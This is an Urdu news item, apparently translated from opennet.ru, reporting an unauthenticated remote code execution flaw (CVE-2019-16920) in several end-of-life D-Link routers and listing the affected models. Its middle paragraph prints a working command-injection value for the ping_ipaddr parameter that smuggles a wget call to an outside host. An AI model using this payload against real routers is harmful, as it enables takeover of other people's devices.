D-Link راؤٹرز میں دور سے فائدہ اٹھانے والا خطرہ

D-Link وائرلیس راؤٹرز میں شناخت کیا خطرناک کمزوری (CVE-2019-16920)، جو آپ کو بغیر تصدیق کے قابل رسائی "ping_test" ہینڈلر کو خصوصی درخواست بھیج کر ڈیوائس سائیڈ پر کوڈ کو دور سے عمل کرنے کی اجازت دیتا ہے۔

دلچسپ بات یہ ہے کہ فرم ویئر ڈویلپرز کے مطابق، "ping_test" کال کو تصدیق کے بعد ہی کیا جانا چاہیے، لیکن حقیقت میں اسے کسی بھی صورت میں کال کیا جاتا ہے، چاہے ویب انٹرفیس میں لاگ ان کیوں نہ ہو۔ خاص طور پر، جب apply_sec.cgi اسکرپٹ تک رسائی حاصل کرتے ہیں اور "action=ping_test" پیرامیٹر کو پاس کرتے ہیں، تو اسکرپٹ توثیق کے صفحہ پر ری ڈائریکٹ ہوتا ہے، لیکن ساتھ ہی ping_test سے وابستہ کارروائی انجام دیتا ہے۔ کوڈ کو عمل میں لانے کے لیے، خود ping_test میں ایک اور کمزوری کا استعمال کیا گیا تھا، جو جانچ کے لیے بھیجے گئے آئی پی ایڈریس کی درستگی کو درست طریقے سے جانچے بغیر پنگ یوٹیلیٹی کو کال کرتا ہے۔ مثال کے طور پر، wget یوٹیلیٹی کو کال کرنے اور "echo 1234" کمانڈ کے نتائج کو کسی بیرونی میزبان کو منتقل کرنے کے لیے، صرف "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" پیرامیٹر کی وضاحت کریں۔ test.test/?$( echo 1234)"۔

D-Link راؤٹرز میں دور سے فائدہ اٹھانے والا خطرہ

مندرجہ ذیل ماڈلز میں خطرے کی موجودگی کی باضابطہ طور پر تصدیق کی گئی ہے۔

  • DIR-655 فرم ویئر 3.02b05 یا اس سے زیادہ کے ساتھ؛
  • DIR-866L فرم ویئر 1.03b04 یا اس سے زیادہ کے ساتھ؛
  • DIR-1565 فرم ویئر 1.01 یا اس سے زیادہ کے ساتھ؛
  • DIR-652 (مسئلہ فرم ویئر ورژن کے بارے میں کوئی معلومات فراہم نہیں کی گئی ہیں)

ان ماڈلز کے لیے سپورٹ کی مدت پہلے ہی ختم ہو چکی ہے، لہذا D-Link بیان کیاجو خطرے کو ختم کرنے کے لیے ان کے لیے اپ ڈیٹ جاری نہیں کرے گا، انہیں استعمال کرنے کی سفارش نہیں کرتا ہے اور انہیں نئے آلات سے تبدیل کرنے کا مشورہ دیتا ہے۔ حفاظتی کام کے طور پر، آپ ویب انٹرفیس تک رسائی کو صرف قابل اعتماد IP پتوں تک محدود کر سکتے ہیں۔

بعد میں پتہ چلا کہ کمزوری بھی تھی۔ متاثر کرتا ہے ماڈل DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 اور DIR-825، اپ ڈیٹس جاری کرنے کے منصوبے جن کے لیے ابھی تک معلوم نہیں ہے۔

ماخذ: opennet.ru

نیا تبصرہ شامل کریں